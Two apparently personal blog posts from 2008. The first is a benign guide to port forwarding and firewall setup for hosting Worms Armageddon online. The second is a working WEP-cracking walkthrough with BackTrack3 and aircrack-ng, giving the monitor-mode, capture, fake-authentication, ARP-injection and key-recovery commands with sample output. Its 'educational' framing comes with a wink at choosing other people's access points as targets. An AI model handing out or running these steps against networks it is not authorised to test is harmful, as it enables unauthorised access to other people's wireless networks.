How To Host in Worms Armageddon

2 Feb 2008 by George Hafiz

Welcome to this short tutorial on how to configure your computer to host a game on WormNet. This guide hopes to teach you the basics on port forwarding, configuring your firewall and what ports you're going to need to have open.
First things first, you need to ask yourself this: do you have a wirless or wired router (or other NAT device) connected between your computer and your internet connection? If the answer is yes, then you need to set up port forwarding. As copmlicated as this sounds, the hardest part of all is probably you logging into your router, and of course that is not hard at all (unless you have forgotten your user and pass!).
If you don't know how to get into your router's administration interface, the easiest way to find this out is to click Start, click Run, and type in cmd. Then go ahead and type in ipconfig /all. C:\Documents and Settings\George>ipconfig /all Windows IP Configuration
Host Name . . . . . . . . . . . . : georgehxp Primary Dns Suffix . . . . . . . : Node Type . . . . . . . . . . . . : Unknown IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter Linksys USB Wifi Dongle: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Compact Wireless-G USB Adapter #2 Physical Address. . . . . . . . . : 00-18-39-**-**-** Dhcp Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : 192.168.1.101 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.1.1 DNS Servers . . . . . . . . . . . : 208.67.222.222
C:\Documents and Settings\George>
Wow, look at all that crazy code. Fortunately, we're only looking for one thing here. The default gateway is the device that your computer uses to connect to the internet. It's your 'gateway' to the internet. So this will be the network address to your router. 99% of router's have a web administration page. Now all you have to do, is enter this address into your browser.

Oh no! What's this? You should have set up a password for when you first connected and set up your router. If you don't remember setting one up, your best bet is the aptly named routerpasswords.com. Simply choose your make from the drop down list, and you'll be given the default credentials. If you're still stuck, check your routers manual on how to do a hard reset and force it back to the default password. Be aware, however, that this can cause more problems!
So now you're inside your router's configuration page, what now? We need to set up port forwarding here. Find an option amongst your navigation panels that looks something like 'Advanced Network Settings', or 'Application Setup'. With my router on the tomato firmware, 'Port Forwarding' is simply listed on the navigation.

Once you're in, you'll be asked a bunch of questions on how you want to set up your port forwarding. The sorts of things almost every router asks, is:

Protocol [TCP/UDP/BOTH]

External Port

Internal Port

Internal Address

For protocol, you should set both TCP and UDP to be forwarded. The External port should be the port range 17010-17012. This should be the same on your Internal Ports. But oh no, I've just said something crazy. Did I say port RANGE?! Yes, I did. What this means is that you want all the ports, 17010, 17011 and 17012 open. If you can't find the option to forward a range of ports, then don't panic, you will at least be able to forward each one manually, it will just take a little longer.

This Internal Address is the address at which your computer is configured to connect to your router on. It will have said the internal address in ipconfig /all. Now you can check back and see your address as listed. You didn't close it, did you? ;-)
Great! We're most of the way there. Now that your router is sending on the messages from the outside world to your computer, we just need to make sure that those messages are allowed to get to Worms! You will find that this is quite similar to when you set up your port forwarding, if not more so. First, establish what firewall you are running. If you haven't configured a firwall, but you have Windows XP Service Pack 2, you will find that you have Windows Firewall. This is easy enough to configure, and you may find that it has already been unblocked from the first time you tried to play on WormNet.

When you first get onto Windows Firewall, through the Control Panel, you should see it On, with exceptions allowed. I.e. as displayed. Now you need to go into the 'Exceptions' tab. Scroll down, and see if you can find 'Worms Armageddon'. If you can, great, you're done and you can go and try to host a Worms game! If you can't, hit 'Add Program...'.
You'll be presented with a great long list of Program's you have installed. I know, you were planning to clean them up, weren't you? If you can't find Worms in there, hit Browse and point to the executable wa.exe. By default, this is 'C:\team17\worms armageddon\wa.exe'.

Once you've selected wa.exe and clicked open, it will be added to the Add a Program list on Windows Firewall. Just click OK and it will be added to Exceptions. Make sure that it has it's box checked. Now click OK. Hooray! Configuration is complete! Now get off the internet and get on wormnet to try out some shoppa-rific game hosting!

aircrack-ng On Eee PC 900 Guide

16 May 2008 by George Hafiz

If you now own a shiny new Asus Eee PC 900 and are interested in a little bit of educational WEP encryption cracking, then you will be grateful to hear that I've written a guide just for you :) Strictly speaking, I wrote this 3 years ago for myself and my rt8180 chipset wireless card so that I'd not forget how to do it, but either way, I've modified it to be perfect for us Eee PC 900 owners!

---

If you haven't done so already, you're going to need to download and install BackTrack3 onto a USB stick, (or burn to a CD and use a USB disc drive, although I strongly suggest you use a memory stick).

To do so, you'll need to go to the Remote-Exploit.org Download Page and get the USB version (or CD if you actually want to). Pick any mirror, or use a torrent if you're feeling adventerous.

In the RAR, you'll find two dir's deep, two folders, one called 'boot' and the other called 'BT3'. Follow the instructs in INSTALL.txt if you are in Linux. On Windows, go into 'boot' via CMD.exe and execute 'bootinst.bat'. Follow the prompts.

Now, you should have a bootable USB stick. Whip it out your PC and stick it in your Eee PC. Put it in the USB socket on the LEFT side, this seems to be the only one I can boot from with mine. Turn on your Eee PC. When you see the GUI POST (when it says Press F2 for setup etc.) press 'esc' and you will be presented with a few places to boot from.

Choose your USB device. Mine's called a Sandisk Cruzer, 'cause I have a Sandisk Cruzer USB stick. Think similarly for your own USB stick ;). You will be presented from a list. Just choose the first one, and it will say after a minute, 'you have an odd display' or something similar. Just hit space to shut it up. After a while, it will come up with a Desktop.

Now, open up a terminal window with Ctrl+Alt+T. Right click in the black area and open another session, twice, so that you now have 3 sessions in tabs open. In the first one, run: airmon-ng start wifi0This will then come up and say that the interface ath1 has been put in monitor mode. From now on, that's the interface you will use.
Now, in the same session, enter:

airodump-ng ath

Now, you will see a list of any APs in the area, with information such as cipher, authentication type etc. The only thing I'm going to show you how to crack here is cipher WEP, and authentication OPN. Anything else requires a much more detailed review, and is more complicated.
Good, now you've found who you want to target, Ctrl+C to stop airodump-ng, and do:

airodump-ng -c [channel] --bssid [AP MAC] -w [filename] ath1

To break down what's done here: [channel] should be the channel of the target AP. [AP MAC] should be the MAC addess, or BSSID of the target, and [filename] can be any name you like, make it something you'll recognise, for example if the target was called 'linksys' then make the filename 'linksys1'. Keep it short and simple. Next, we're going to associate with the AP so we can inject packets and speed up airodump-ng catching data. In the second session we opened earlier, do:

aireplay-ng --fakeauth 0 -e [AP SSID] -a [AP MAC] ath1

Cool, now you should get something like:

18:18:20  Sending Authentication Request
18:18:20  Authentication successful
18:18:20  Sending Association Request
18:18:20  Association successful :-)

Nice, if you get this, you're sorted! If you don't, you probably have a picky target, or they are using MAC address blocking. Try this for picky AP's.

Aireplay-ng --fakeauth 6000 -o 1 -q 10 -e [AP SSID] -a [AP MAC] ath1 If you see this:

18:22:32  Sending Authentication Request
18:22:32  Authentication successful
18:22:32  Sending Association Request
18:22:32  Association successful :-)
18:22:42  Sending keep-alive packet
18:22:52  Sending keep-alive packet

Then hooray, you've done it =). Else, give up, and find another target, I mean, change YOUR router settings...
Now it's time to start injecting. I hope you're not afraid of needles:

aireplay-ng -3 -b [AP MAC] ath1 -x 250

It will sit and wait for an ARP ack or request now. If you happen to have a BTHomeHub, then this shouldn't take long, even if there are no active clients on the AP. Once it gets an ARP, numbers will start going crazy, so you know it's working. Go to session one and watch the data column number rise dramatically.
Right, now we play the waiting game. Wait until the data number is about 40,000. Then start crackin'! In the third session, enter:

aircrack-ng -z -b [AP MAC] [filename*.cap

Don't forget to enter in your filename, in our example, linksys1*.cap. It willstart working on it, and display the WEP key when finished. As a footnote, remember whenever you are entering the SSID (the name of the network), it is case sensitive, so BTHomeHub-FE1D will NEED you to enter in the capitals there, otherwise you won't be able to associate.
Happy educating ;0